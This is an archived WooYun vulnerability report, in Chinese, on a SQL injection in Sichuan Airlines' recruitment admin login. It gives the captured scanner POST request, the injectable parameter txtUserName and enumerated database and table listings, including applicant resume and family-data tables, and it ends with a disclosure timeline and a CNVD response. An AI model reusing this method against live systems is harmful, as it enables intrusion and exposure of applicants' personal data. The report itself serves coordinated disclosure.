当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100183

漏洞标题:四川航空内部系统某漏洞致使大量敏感信息泄露(人员详细简历)

相关厂商:四川航空

漏洞作者: BMa

提交时间:2015-03-09 08:20

修复时间:2015-04-23 08:22

公开时间:2015-04-23 08:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 细节已通知厂商并且等待厂商处理中
2015-03-12: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-23: 细节向公众公开

简要描述:

四川航空内部系统某漏洞致使大量敏感信息泄露-招聘人员简历

详细说明:

http://www.scal.com.cn/invite2011/admin/

POST /invite2011/admin/default.aspx HTTP/1.1
Cache-Control: no-cache
Referer: http://www.scal.com.cn/invite2011/admin/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: www.scal.com.cn
Cookie: ASP.NET_SessionId=uiasqy55q0mlp5j1emv11fa0
Accept-Encoding: gzip, deflate
Content-Length: 395
Content-Type: application/x-www-form-urlencoded
__VIEWSTATE=%2fwEPDwUJLTQyMDQ0NDg0ZGRW8Rle1Eha335a1UCBGPqyRjakLA%3d%3d&__EVENTVALIDATION=%2fwEWBALX1NKuAwKl1bKzCQK9wKW7DALCi9reAwrmloSmySCI2FFhDfLvB09EGUm%2b&txtUserName=&txtUserPassword=3&btnSubmit=%e7%99%bb%e5%bd%95


参数:txtUserName

available databases [24]:
[*] Invite2011
[*] master
[*] model
[*] msdb
[*] SCAL3_B2C
[*] SCAL3_Card
[*] SCAL3_Familiar
[*] SCAL3_Hotel
[*] SCAL3_InsuranceNew
[*] SCAL3_Itinerary
[*] SCAL3_Log
[*] SCAL3_Mall
[*] SCAL3_Member
[*] SCAL3_Message
[*] SCAL3_MinPrice
[*] SCAL3_News
[*] SCAL3_Order
[*] SCAL3_Pay
[*] SCAL3_Preferential
[*] SCAL3_SaleRule
[*] SCAL3_SessionService
[*] SCAL3_SOA
[*] SCAL3_System
[*] tempdb


1.jpg


2.jpg


3.jpg


4.jpg


所有库count

5.jpg


用户的详细信息如下:

6.jpg


6.1.jpg


7.jpg


附上清单:

Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 99632   |
| sys.sysmessages                                  | 99632   |
| sys.syscolumns                                   | 10759   |
| sys.all_parameters                               | 6761    |
| sys.system_parameters                            | 6761    |
| sys.trace_subclass_values                        | 4729    |
| sys.trace_event_bindings                         | 3965    |
| sys.all_columns                                  | 3793    |
| sys.system_columns                               | 3749    |
| sys.syscomments                                  | 2793    |
| dbo.spt_values                                   | 2346    |
| sys.all_objects                                  | 1779    |
| sys.sysobjects                                   | 1779    |
| sys.system_objects                               | 1773    |
| sys.database_permissions                         | 1675    |
| sys.syspermissions                               | 1675    |
| sys.sysprotects                                  | 1674    |
| sys.all_sql_modules                              | 1621    |
| sys.system_sql_modules                           | 1621    |
| sys.all_views                                    | 286     |
| sys.system_views                                 | 286     |
| sys.event_notification_event_types               | 193     |
| sys.trace_events                                 | 171     |
| sys.syscharsets                                  | 114     |
| sys.allocation_units                             | 112     |
| sys.partitions                                   | 101     |
| sys.system_components_surface_area_configuration | 99      |
| sys.xml_schema_facets                            | 97      |
| sys.xml_schema_components                        | 93      |
| sys.xml_schema_types                             | 77      |
| sys.configurations                               | 65      |
| sys.sysconfigures                                | 65      |
| sys.syscurconfigs                                | 65      |
| sys.trace_columns                                | 65      |
| sys.fulltext_document_types                      | 50      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES             | 44      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.syslanguages                                 | 33      |
| sys.systypes                                     | 27      |
| sys.types                                        | 27      |
| sys.database_recovery_status                     | 25      |
| sys.databases                                    | 25      |
| sys.sysdatabases                                 | 25      |
| sys.securable_classes                            | 21      |
| sys.trace_categories                             | 21      |
| sys.fulltext_languages                           | 17      |
| sys.xml_schema_component_placements              | 17      |
| INFORMATION_SCHEMA.SCHEMATA                      | 14      |
| sys.database_principals                          | 14      |
| sys.schemas                                      | 14      |
| sys.sysusers                                     | 14      |
| sys.xml_schema_attributes                        | 14      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.service_queue_usages                         | 3       |
| sys.syssegments                                  | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: Invite2011
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.t_InviteEducation_bak                        | 15088   |
| dbo.t_InviteEducation_bak                        | 15088   |
| dbo.t_InviteFamily_bak                           | 13614   |
| dbo.t_InviteFamily_bak                           | 13614   |
| dbo.t_Invite_bak                                 | 8546    |
| dbo.t_Invite_bak                                 | 8546    |
| dbo.t_InviteWork_bak                             | 6432    |
| dbo.t_InviteWork_bak                             | 6432    |
| dbo.t_User                                       | 3       |
| dbo.sysdiagrams                                  | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile                                   | 404     |
| dbo.backupset                                    | 202     |
| dbo.backupmediafamily                            | 196     |
| dbo.backupmediaset                               | 192     |
| dbo.restorefilegroup                             | 5       |
| dbo.restorefilegroup                             | 5       |
| dbo.restorehistory                               | 5       |
+--------------------------------------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-12 13:15

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向网站管理单位通报。

最新状态:

暂无